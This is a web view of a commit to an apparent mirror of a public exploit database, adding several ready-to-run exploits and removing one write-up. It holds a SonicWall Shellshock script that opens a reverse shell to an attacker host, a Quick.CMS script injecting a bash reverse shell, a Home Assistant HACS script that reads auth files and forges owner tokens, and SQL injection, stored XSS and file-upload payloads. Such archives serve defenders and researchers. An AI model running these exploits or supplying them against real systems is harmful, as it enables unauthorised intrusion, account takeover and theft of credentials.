bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-01-30

Browse source 
12 changes to exploits/shellcodes

Apache - Arbitrary Long HTTP Headers Denial of Service (Perl)
Apache - Arbitrary Long HTTP Headers (Denial of Service)

Microsoft Internet Explorer - Denial of Service (11 bytes)
Microsoft Internet Explorer - Denial of Service

Apache - Arbitrary Long HTTP Headers Denial of Service (C)
Apache - Arbitrary Long HTTP Headers Denial of Service
phpBB 2.0.15 - Register Multiple Users (Denial of Service) (Perl)
phpBB 2.0.15 - Register Multiple Users (Denial of Service) (C)
phpBB 2.0.15 - Register Multiple Users (Denial of Service)
XChat 2.6.7 (Windows) - Remote Denial of Service (PHP)
XChat 2.6.7 (Windows) - Remote Denial of Service (Perl)
XChat 2.6.7 (Windows) - Remote Denial of Service

Opera 9 IRC Client - Remote Denial of Service (Python)
Opera 9 IRC Client - Remote Denial of Service

Xfire 1.6.4 - Remote Denial of Service (Perl)
Xfire 1.6.4 - Remote Denial of Service

Microsoft Windows - NAT Helper Components Remote Denial of Service (Perl)
Microsoft Windows - NAT Helper Components Remote Denial of Service

Apple CFNetwork - HTTP Response Denial of Service (Ruby)
Apple CFNetwork - HTTP Response Denial of Service

PHP < 5.3.1 - 'MultiPart/form-data' Denial of Service (Python)
PHP < 5.3.1 - 'MultiPart/form-data' Denial of Service

PHP Hosting Directory 2.0 - Database Disclosure (Python)
PHP Hosting Directory 2.0 - Database Disclosure
Ascend R 4.5 Ci12 - Denial of Service (C)
Ascend R 4.5 Ci12 - Denial of Service (Perl)
Ascend R 4.5 Ci12 - Denial of Service

BulletProof FTP Client 2010 - Buffer Overflow (SEH) (Python)
BulletProof FTP Client 2010 - Buffer Overflow (SEH)

RedHat 6.2 Restore and Dump - Local Privilege Escalation (Perl)
RedHat 6.2 Restore and Dump - Local Privilege Escalation

Apple Mac OSX Adobe Version Cue - Local Privilege Escalation (Bash)
Apple Mac OSX Adobe Version Cue - Local Privilege Escalation

Apple Mac OSX Adobe Version Cue - Local Privilege Escalation (Perl)
Apple Mac OSX Adobe Version Cue - Local Privilege Escalation

ARPUS/Ce - Local Overflow (setuid) (Perl)
ARPUS/Ce - Local Overflow (setuid)

Xmame 0.102 - 'lang' Local Buffer Overflow (C)
Xmame 0.102 - 'lang' Local Buffer Overflow

CoolPlayer 2.19 - '.Skin' Local Buffer Overflow (Python)
CoolPlayer 2.19 - '.Skin' Local Buffer Overflow
Browser3D 3.5 - '.sfs' Local Stack Overflow (C)
Browser3D 3.5 - '.sfs' Local Stack Overflow (Perl)
Browser3D 3.5 - '.sfs' Local Stack Overflow

CastRipper 2.50.70 - '.m3u' Universal Stack Overflow (Python)
CastRipper 2.50.70 - '.m3u' Universal Stack Overflow

Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation (Python)
Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation
Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Perl)
Soritong 1.0 - Universal Buffer Overflow (Python)
Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Python)
Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow
Soritong 1.0 - Universal Buffer Overflow
Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow

Apple Mac OSX 10.8.4 - Local Privilege Escalation (Python)
Apple Mac OSX 10.8.4 - Local Privilege Escalation

BulletProof FTP Client 2010 - Local Buffer Overflow (SEH) (Ruby)
BulletProof FTP Client 2010 - Local Buffer Overflow (SEH)

Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Local Privilege Escalation (MS16-032) (C#)
Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Local Privilege Escalation (MS16-032)

10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)
10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH) (ROP)

B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter)
B64dec 1.1.2 - Buffer Overflow (SEH Overflow + EggHunter)

10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR)
10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH) (ASLR + DEP Bypass)

Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (PHP)
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure

Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure

Microsoft Internet Explorer - 'VML' Remote Buffer Overflow (SP2) (Perl)
Microsoft Internet Explorer - 'VML' Remote Buffer Overflow (SP2)

Microsoft Windows - 'NetpManageIPCConnect' Remote Stack Overflow (MS06-070) (Python)
Microsoft Windows - 'NetpManageIPCConnect' Remote Stack Overflow (MS06-070)

3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode (Perl)
3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode
WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (Python)
WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (Perl)
WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow

3proxy 0.5.3g (Windows x86) - 'logurl()' Remote Buffer Overflow (Perl)
3proxy 0.5.3g (Windows x86) - 'logurl()' Remote Buffer Overflow

OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Perl)
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH

OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Python)
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH

Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution (Python)
Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution

IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow (C)
IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow

BIND 9.x - Remote DNS Cache Poisoning (Python)
BIND 9.x - Remote DNS Cache Poisoning

Microsoft Internet Explorer 7 - Memory Corruption (MS09-002) (Python)
Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)

EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (Perl)
EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow

Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP)
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass

Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow (Perl)
Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow

Endian Firewall < 3.0.0 - OS Command Injection (Python)
Endian Firewall < 3.0.0 - OS Command Injection
AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution (C)
AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution (Perl)
AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution

phpBB 2.0.12 - Change User Rights Authentication Bypass (C)
phpBB 2.0.12 - Change User Rights Authentication Bypass
Maxwebportal 1.36 - 'Password.asp' Change Password (3) (Perl)
Maxwebportal 1.36 - 'Password.asp' Change Password (2) (PHP)
Maxwebportal 1.36 - 'Password.asp' Change Password (3)
Maxwebportal 1.36 - 'Password.asp' Change Password (2)

phpStat 1.5 - 'setup.php' Authentication Bypass (Perl)
phpStat 1.5 - 'setup.php' Authentication Bypass

SimpleBBS 1.1 - Remote Command Execution (C)
SimpleBBS 1.1 - Remote Command Execution
DataLife Engine 4.1 - SQL Injection (Perl)
DataLife Engine 4.1 - SQL Injection (PHP)
DataLife Engine 4.1 - SQL Injection

cPanel 10.8.x - 'cpwrap' via MySQLAdmin Privilege Escalation (PHP)
cPanel 10.8.x - 'cpwrap' via MySQLAdmin Privilege Escalation
Fuzzylime CMS 3.01 - 'poll' Remote Code Execution (PHP)
Fuzzylime CMS 3.01 - 'poll' Remote Code Execution (Perl)
Fuzzylime CMS 3.01 - 'poll' Remote Code Execution

webSPELL 4.2.0d (Linux) - Local File Disclosure (C)
webSPELL 4.2.0d (Linux) - Local File Disclosure

Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python)
Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting

WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload (Python)
WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload
PHPMailer < 5.2.18 - Remote Code Execution (Bash)
PHPMailer < 5.2.18 - Remote Code Execution (PHP)
PHPMailer < 5.2.18 - Remote Code Execution

PHPMailer < 5.2.18 - Remote Code Execution (Python)
PHPMailer < 5.2.18 - Remote Code Execution

WordPress Core 4.7.0/4.7.1 - Content Injection (Python)
WordPress Core 4.7.0/4.7.1 - Content Injection

Wordpress Plugin Contact Form 7 5.3.1 - Unrestricted File Upload
BloofoxCMS 0.5.2.1 - 'text' Stored Cross Site Scripting
Online Grading System 1.0 - 'uname' SQL Injection
Quick.CMS 6.7 - Remote Code Execution (Authenticated)
Home Assistant Community Store (HACS) 1.10.0 - Path Traversal to Account Takeover
MyBB Hide Thread Content Plugin 1.0 - Information Disclosure
Simple Public Chat Room 1.0 - Authentication Bypass SQLi
Simple Public Chat Room 1.0 - 'msg' Stored Cross-Site Scripting
SonicWall SSL-VPN 8.0.0.0 - 'shellshock/visualdoor' Remote Code Execution (Unauthenticated)
This commit is contained in:
Offensive Security 2021-01-30 05:01:55 +00:00
parent 82075ed5ca
commit dade976f06
12 changed files with 450 additions and 111 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

105
exploits/hardware/webapps/49499.py Executable file
View file

@ -0,0 +1,105 @@
# Exploit Title: SonicWall SSL-VPN 8.0.0.0 - 'shellshock/visualdoor' Remote Code Execution (Unauthenticated)
# Exploit Author: Darren Martyn
# Vendor Homepage: https://www.home-assistant.io/
# Version: < SMA 8.0.0.4
# Blog post: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
#!/usr/bin/python
# coding: utf-8
# Author: Darren Martyn
# Credit: Phineas Fisher
# Notes:
# This exploit basically implements the exploits Phineas Fisher used to pwn Hacking Team
# and the Cayman Trust Bank place. It uses the Shellshock vulnerability to gain a command
# execution primitive as the "nobody" user in the cgi-bin/jarrewrite.sh web-script, spawns
# a trivial reverse shell using /dev/tcp.
# There is a fairly trivial LPE in these that gets you root by abusing setuid dos2unix, but
# implementing that is left as an exercise for the reader. I've seen a few approaches, and
# would be interested in seeing yours.
# There is another LPE that works only on some models which I also have removed from this.
# Details: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
import requests
import sys
import telnetlib
import socket
from threading import Thread
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import time
def banner():
print """
88 88
"" 88
88
8b d8 88 ,adPPYba, 88 88 ,adPPYYba, 88
`8b d8' 88 I8[ "" 88 88 "" `Y8 88
`8b d8' 88 `"Y8ba, 88 88 ,adPPPPP88 88
`8b,d8' 88 aa ]8I "8a, ,a88 88, ,88 88
"8" 88 `"YbbdP"' `"YbbdP'Y8 `"8bbdP"Y8 88
88
88
88
,adPPYb,88 ,adPPYba, ,adPPYba, 8b,dPPYba,
a8" `Y88 a8" "8a a8" "8a 88P' "Y8
8b 88 8b d8 8b d8 88
"8a, ,d88 "8a, ,a8" "8a, ,a8" 88
`"8bbdP"Y8 `"YbbdP"' `"YbbdP"' 88
SonicWall SSL-VPN Appliance Remote Exploit
Public Release (Jan 2021). Author: Darren Martyn. Credit
goes to Phineas Fisher for this. Stay inside, do crimes.
"""
def handler(lp): # handler borrowed from Stephen Seeley.
print "(+) starting handler on port %d" %(lp)
t = telnetlib.Telnet()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", lp))
s.listen(1)
conn, addr = s.accept()
print "(+) connection from %s" %(addr[0])
t.sock = conn
print "(+) pop thy shell!"
t.interact()
def execute_command(target, command):
url = target + "/cgi-bin/jarrewrite.sh"
headers = {"User-Agent": "() { :; }; echo ; /bin/bash -c '%s'" %(command)}
r = requests.get(url=url, headers=headers, verify=False)
return r.text
def check_exploitable(target):
print "(+) Testing %s for pwnability..." %(target)
output = execute_command(target=target, command="cat /etc/passwd")
if "root:" in output:
print "(*) We can continue, time to wreck this shit."
return True
else:
return False
def pop_reverse_shell(target, cb_host, cb_port):
print "(+) Sending callback to %s:%s" %(cb_host, cb_port)
backconnect = "nohup bash -i >& /dev/tcp/%s/%s 0>&1 &" %(cb_host, cb_port)
execute_command(target=target, command=backconnect)
def hack_the_planet(target, cb_host, cb_port):
if check_exploitable(target) == True:
pass
else:
sys.exit("(-) Target not exploitable...")
handlerthr = Thread(target=handler, args=(int(cb_port),))
handlerthr.start()
pop_reverse_shell(target=target, cb_host=cb_host, cb_port=cb_port)
def main(args):
banner()
if len(args) != 4:
sys.exit("use: %s https://some-vpn.lol:8090 hacke.rs 1337" %(args[0]))
hack_the_planet(target=args[1], cb_host=args[2], cb_port=args[3])
if __name__ == "__main__":
main(args=sys.argv)

37
exploits/php/webapps/49294.txt
View file

@ -1,37 +0,0 @@
# Exploit Title: Wordpress Plugin Contact Form 7 5.3.1 - Unrestricted File Upload
# Date: 12/20/2020
# Exploit Author: Ramón Vila Ferreres (@ramonvfer)
# Vendor Homepage: https://contactform7.com
# Software Link: https://wordpress.org/plugins/contact-form-7/
# Version: 5.3.1 and below
# Tested on: Windows 10 1909, Ubuntu 20.4
Explanation
---------------------------------------------------------------------
ContactForm7 version 5.3.1 and below doesn't properly sanitize
uploaded filenames to prevent Arbitrary File Upload that can lead
to full server takeover in the worst-case scenario.
This happens in the wpcf7_antiscript_file_name function, that fails
to sanitize the provided filename if it ends with any Unicode special
character ranging from U+0000 (null) to U+001F (us).
The function matches both the file name and the file extension against
an exclusion regex. Appending any unicode special character to the
file extension results in a complete bypass of this verification (as
the regex doesn't match) leading to the Unrestricted File Upload.
Exploit
---------------------------------------------------------------------
1. Change the file extension of the file you want to upload (e.g:
"shell.php") to its equivalent with the special character ending (in
this case "shell.php" (appended U+0000))
2. Upload the file using ContactForm7 file upload feature in the
target website.
3. Go to <target.com>/wp-content/uploads/wpcf7_uploads/shell.php
Note the special character at the end
Note that the file upload location may vary as it is configurable.
4. Now you have uploaded your file!

1
exploits/php/webapps/49468.txt
View file

@ -4,6 +4,7 @@
# Vendor Homepage: https://collabtive.o-dyn.de/
# Version: 3.1
# Tested on: Windows & XAMPP
# CVE: CVE-2021-3298
==> Tutorial <==

15
exploits/php/webapps/49492.txt Normal file
View file

@ -0,0 +1,15 @@
# Title: BloofoxCMS 0.5.2.1 - 'text' Stored Cross Site Scripting
# Exploit Author: LiPeiYi
# Date: 2020-12-18
# Vendor Homepage: https://www.bloofox.com/
# Software Link: https://github.com/alexlang24/bloofoxCMS/releases/tag/0.5.2.1
# Version: 0.5.1.0 -.5.2.1
# Tested on: windows 10
Vulnerable paper: /admin/include/inc_content_articles.php
Steps to reproduce:
1: Log in with a valid username and password. Navigate to the "articles" tab on the left-hand side.
2: Add the new post and then add the payload "payload: <img src=# onerror=alert('xss')>" in "text" parameter and click on save button. Post Saved successfully.
3: Now, XSS will get stored and trigger every time and the attacker can steal authenticated users' cookies.

30
exploits/php/webapps/49493.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: Online Grading System 1.0 - 'uname' SQL Injection
# Date: 2021-01-28
# Exploit Author: Ruchi Tiwari
# Vendor Homepage: https://www.sourcecodester.com/php/13711/online-grading-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/onlinegradingsystem.zip
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
---------------------------------------------------------------------------------
#parameter Vulnerable: uname
# Injected Request
POST /onlinegradingsystem/admin/login.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/onlinegradingsystem/admin/login.php
Cookie: PHPSESSID=mavnqgmmv1o0vtqld99vtdv1us
Upgrade-Insecure-Requests: 1
uname=ruchi'||(SELECT 0x4375526c WHERE 6468=6468 AND (SELECT 4401 FROM (SELECT(SLEEP(20)))ariq))||'&pass=admin&btnlogin=
#Application will load after 20 minutes.
--------------------------------------------------------------------------------------------------------------------

71
exploits/php/webapps/49494.py Executable file
View file

@ -0,0 +1,71 @@
# Exploit Title: Quick.CMS 6.7 - Remote Code Execution (Authenticated)
# Date: 2020-12-28
# Exploit Author: mari0x00
# Vendor Homepage: https://opensolution.org/
# Software Link: https://opensolution.org/download/?sFile=Quick.Cms_v6.7-pl.zip
# Description: https://secator.pl/index.php/2021/01/28/cve-2020-35754-authenticated-rce-in-quick-cms-and-quick-cart/
# Version: <= 6.7
# CVE : CVE-2020-35754
#!/usr/bin/python3
import requests
import sys
from termcolor import colored
from time import sleep
print(colored('''###########################################################''',"red"))
print(colored('''###### Quick.CMS authenticated RCE by mari0x00 #######''',"red"))
print(colored('''###########################################################''',"red"))
print("")
if len(sys.argv) != 6:
print((colored("[~] Usage : python3 quickpwn.py <url> <username> <password> <IP> <PORT>","red")))
print((colored("[~] Example: python3 quickpwn.py http://192.168.101.105/quick.cms/ john@example.com pass123 192.168.101.101 4444","red")))
exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
IP = sys.argv[4]
PORT = sys.argv[5]
#Start session
s = requests.Session()
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'}
#Authenticate
print((colored("[+] Attempting user login","blue")))
login_data = {
"sEmail": username,
"sPass": password,
"bAcceptLicense": "1",
"iAcceptLicense": "true"
}
login = s.post(url+"admin.php?p=login", login_data, headers=headers)
sleep(0.5)
#Exploit
print((colored("[+] Adding shell command","blue")))
payload = "Back end\\\"; system('/bin/bash -c \\'bash -i >& /dev/tcp/" + IP + "/" + PORT + " 0>&1\\''); //"
shell = {
"sOption": "save",
"Back_end_only": payload
}
exploit = s.post(url+"admin.php?p=languages&sLangEdit=en", shell, headers=headers)
sleep(1)
#Triggering reverse shell (three times just in case)
print("")
print((colored("[+] Triggering the shell. Go nuts!","green")))
r = s.get(url+"admin.php?p=languages", headers=headers)
sleep(1)
r = s.get(url+"admin.php?p=languages", headers=headers)
sleep(1)
r = s.get(url+"admin.php?p=languages", headers=headers)

18
exploits/php/webapps/49496.txt Normal file
View file

@ -0,0 +1,18 @@
# Exploit Title: MyBB Hide Thread Content Plugin 1.0 - Information Disclosure
# Date: 1/27/2021
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1430
# Version: 1.0
# Tested on: Windows 10
# CVE: CVE-2021-3337
1. Description:
This plugin hides thread content until user replies to the thread. The information disclosure is hidden content can be viewed without replying.
2. Proof of Concept:
- Visit a post where content is hidden
- Click the reply or quote button below
Thread content will be displayed in the [quote] bracket without needing to reply

20
exploits/php/webapps/49497.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: Simple Public Chat Room 1.0 - Authentication Bypass SQLi
# Exploit Author: Richard Jones
# Date: 2021-01-26
# Vendor Homepage: https://www.sourcecodester.com/php/12295/simple-public-chat-room-using-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12295&title=Simple+Public+Chat+Room+Using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
POST /chat/login.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Connection: close
Referer: http://localhost/chat/index.php?attempt=
Cookie: PHPSESSID=r2focevhk11aqka051gt26qfhl
Upgrade-Insecure-Requests: 1
username=aa%27+or+1%3D1+--&password=%27+or+1%3D1+--

23
exploits/php/webapps/49498.txt Normal file
View file

@ -0,0 +1,23 @@
# Exploit Title: Simple Public Chat Room 1.0 - 'msg' Stored Cross-Site Scripting
# Exploit Author: Richard Jones
# Date: 2021-01-26
# Vendor Homepage: https://www.sourcecodester.com/php/12295/simple-public-chat-room-using-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12295&title=Simple+Public+Chat+Room+Using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
#Replicates across chat sessions..
POST /chat/send_message.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 58
Origin: http://localhost
Connection: close
Cookie: PHPSESSID=r2focevhk11aqka051gt26qfhl
msg=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&id=1

86
exploits/python/webapps/49495.py Executable file
View file

@ -0,0 +1,86 @@
# Exploit Title: Home Assistant Community Store (HACS) 1.10.0 - Path Traversal to Account Takeover
# Date: 2021-01-28
# Exploit Author: Lyghtnox
# Vendor Homepage: https://www.home-assistant.io/
# Software Link: https://github.com/hacs/integration
# Version: < 1.10.0
# Tested on: Raspbian + Home Assistant 2021.1.0
# Blog post: https://lyghtnox.gitlab.io/posts/hacs-exploit/
# STEP 1: Run the exploit (python3 exploit.py host port)
# STEP 2: Copy the token printed and set in your browser's local storage with
# the key `hassTokens`
import requests
import jwt
import json
import argparse
class HA:
def __init__(self, ip, port):
self.ip = ip
self.port = port
def retrieveFile(self, f):
url = f'http://{self.ip}:{self.port}/hacsfiles/../../{f}'
with requests.Session() as s:
r = requests.Request(method='GET', url=url)
prep = r.prepare()
prep.url = url
try:
r = s.send(prep, verify=False)
except requests.exceptions.ConnectionError:
return
if r.status_code == 400 or r.status_code == 404:
return
return r
def craftToken(self):
f = self.retrieveFile('.storage/auth').json()
# Find owner
for user in f['data']['users']:
if user['is_owner']:
self.owner = user['id']
break
else:
print("No owner found. Using first account")
self.owner = f['data']['users'][0]['id']
for token in f['data']['refresh_tokens']:
if self.owner == token['user_id']:
encoded_jwt = jwt.encode({'iss': token['id']},
token['jwt_key'],
algorithm="HS256")
self.token = {'access_token': encoded_jwt,
'token_type': 'Bearer',
'refresh_token': token['token'],
'expires_in': 1800,
'hassUrl': f"http://{self.ip}:{self.port}",
'clientId': token['client_id']}
return self.token
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Exploit a vulnerability in \
HACS < 1.10.0 to gain admin access to an Home Assistant instance.")
parser.add_argument("host", type=str, help="IP of the HASS instance")
parser.add_argument("port", type=int, help="port of the HASS instance")
args = parser.parse_args()
r = requests.get('http://{ip}:{port}/hacsfiles/iconset.js'.format(
ip=args.host,
port=args.port))
if r.status_code != 404:
print("HACS found! Testing vulnerability...", end='', flush=True)
ha = HA(args.host, args.port)
if ha.retrieveFile('configuration.yaml'):
print(": VULNERABLE")
token = ha.craftToken()
if token:
print(f"Use the following 'hassTokens': {json.dumps(token)}")
else:
print("Unable to craft token")
else:
print(": Not vulnerable")

2
exploits/windows/local/49116.py
View file

@ -1,5 +1,5 @@
# Exploit Title: Foxit Reader 9.0.1.1049 - Arbitrary Code Execution
# Date: August 29, 2020
# Date: 2020-08-29
# Exploit Author: CrossWire
# Vendor Homepage: https://www.foxitsoftware.com/
# Software Link: https://www.foxitsoftware.com/downloads/latest.php?product=Foxit-Reader&platform=Windows&version=9.0.1.1049&package_type=exe&language=English

153
files_exploits.csv
View file

@ -55,13 +55,13 @@ id,file,description,date,author,type,platform,port
356,exploits/windows/dos/356.c,"OverByte ICS FTP Server - Remote Denial of Service",2004-07-20,ATmaCA,dos,windows,
357,exploits/windows/dos/357.c,"Medal of Honor - Remote Buffer Overflow (PoC)",2004-07-20,"Luigi Auriemma",dos,windows,
358,exploits/hardware/dos/358.txt,"Lexmark Multiple HTTP Servers - Denial of Service",2004-07-22,"Peter Kruse",dos,hardware,
360,exploits/multiple/dos/360.pl,"Apache - Arbitrary Long HTTP Headers Denial of Service (Perl)",2004-07-22,bkbll,dos,multiple,80
360,exploits/multiple/dos/360.pl,"Apache - Arbitrary Long HTTP Headers (Denial of Service)",2004-07-22,bkbll,dos,multiple,80
362,exploits/windows/dos/362.sh,"Xitami Web Server - Denial of Service",2004-07-22,CoolICE,dos,windows,
363,exploits/hardware/dos/363.txt,"Conceptronic CADSLR1 Router - Denial of Service",2004-07-22,"Seth Alan Woolley",dos,hardware,
365,exploits/windows/dos/365.html,"Microsoft Internet Explorer - Denial of Service (11 bytes)",2004-07-23,Phuong,dos,windows,
365,exploits/windows/dos/365.html,"Microsoft Internet Explorer - Denial of Service",2004-07-23,Phuong,dos,windows,
366,exploits/windows/dos/366.pl,"Microsoft Windows SMS 2.0 - Denial of Service",2004-07-24,MacDefender,dos,windows,
370,exploits/linux/dos/370.c,"Citadel/UX - Remote Denial of Service (PoC)",2004-08-02,CoKi,dos,linux,
371,exploits/linux/dos/371.c,"Apache - Arbitrary Long HTTP Headers Denial of Service (C)",2004-08-02,anonymous,dos,linux,
371,exploits/linux/dos/371.c,"Apache - Arbitrary Long HTTP Headers Denial of Service",2004-08-02,anonymous,dos,linux,
376,exploits/windows/dos/376.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Null Pointer Crash",2004-08-04,anonymous,dos,windows,
383,exploits/multiple/dos/383.c,"psyBNC 2.3 - Denial of Service",2002-05-19,"Lunar Fault",dos,multiple,31337
385,exploits/windows/dos/385.c,"Microsoft Messenger (Linux) - Denial of Service (MS03-043)",2004-08-08,VeNoMouS,dos,windows,
@ -184,8 +184,8 @@ id,file,description,date,author,type,platform,port
1027,exploits/windows/dos/1027.c,"FutureSoft TFTP Server 2000 - Remote Denial of Service",2005-06-02,ATmaCA,dos,windows,
1037,exploits/multiple/dos/1037.c,"Tcpdump - bgp_update_print Remote Denial of Service",2005-06-09,simon,dos,multiple,
1056,exploits/multiple/dos/1056.pl,"Apache 2.0.49 - Arbitrary Long HTTP Headers Denial of Service",2005-06-20,Qnix,dos,multiple,
1063,exploits/php/dos/1063.pl,"phpBB 2.0.15 - Register Multiple Users (Denial of Service) (Perl)",2005-06-22,g30rg3_x,dos,php,
1064,exploits/php/dos/1064.c,"phpBB 2.0.15 - Register Multiple Users (Denial of Service) (C)",2005-06-22,HaCkZaTaN,dos,php,
1063,exploits/php/dos/1063.pl,"phpBB 2.0.15 - Register Multiple Users (Denial of Service)",2005-06-22,g30rg3_x,dos,php,
1064,exploits/php/dos/1064.c,"phpBB 2.0.15 - Register Multiple Users (Denial of Service)",2005-06-22,HaCkZaTaN,dos,php,
1065,exploits/windows/dos/1065.c,"Microsoft Windows - 'SMB' Transaction Response Handling (MS05-011)",2005-06-23,cybertronic,dos,windows,
1067,exploits/windows/dos/1067.cpp,"TCP-IP Datalook 1.3 - Local Denial of Service",2005-06-25,basher13,dos,windows,
1072,exploits/multiple/dos/1072.cpp,"Stream / Raped (Windows) - Denial of Service",2005-06-27,"Marco Del Percio",dos,multiple,
@ -373,13 +373,13 @@ id,file,description,date,author,type,platform,port
2057,exploits/windows/dos/2057.c,"Microsoft Windows - Mailslot Ring0 Memory Corruption (MS06-035)",2006-07-21,cocoruder,dos,windows,
2059,exploits/hardware/dos/2059.cpp,"D-Link Devices - UPNP Stack Overflow Denial of Service (PoC)",2006-07-22,ub3rst4r,dos,hardware,
2073,exploits/multiple/dos/2073.c,"libmikmod 3.2.2 - GT2 Loader Local Heap Overflow (PoC)",2006-07-25,"Luigi Auriemma",dos,multiple,
2124,exploits/windows/dos/2124.php,"XChat 2.6.7 (Windows) - Remote Denial of Service (PHP)",2006-08-07,ratboy,dos,windows,
2147,exploits/windows/dos/2147.pl,"XChat 2.6.7 (Windows) - Remote Denial of Service (Perl)",2006-08-08,Elo,dos,windows,
2124,exploits/windows/dos/2124.php,"XChat 2.6.7 (Windows) - Remote Denial of Service",2006-08-07,ratboy,dos,windows,
2147,exploits/windows/dos/2147.pl,"XChat 2.6.7 (Windows) - Remote Denial of Service",2006-08-08,Elo,dos,windows,
2156,exploits/hardware/dos/2156.c,"PocketPC Mms Composer - 'WAPPush' Denial of Service",2006-08-09,"Collin Mulliner",dos,hardware,
2160,exploits/windows/dos/2160.c,"OpenMPT 1.17.02.43 - Multiple Remote Buffer Overflows (PoC)",2006-08-10,"Luigi Auriemma",dos,windows,
2176,exploits/hardware/dos/2176.html,"Nokia Symbian 60 3rd Edition - Browser Crash (Denial of Service)",2006-08-13,Qode,dos,hardware,
2179,exploits/multiple/dos/2179.c,"Opera 9 - IRC Client Remote Denial of Service",2006-08-13,Preddy,dos,multiple,
2180,exploits/multiple/dos/2180.py,"Opera 9 IRC Client - Remote Denial of Service (Python)",2006-08-13,Preddy,dos,multiple,
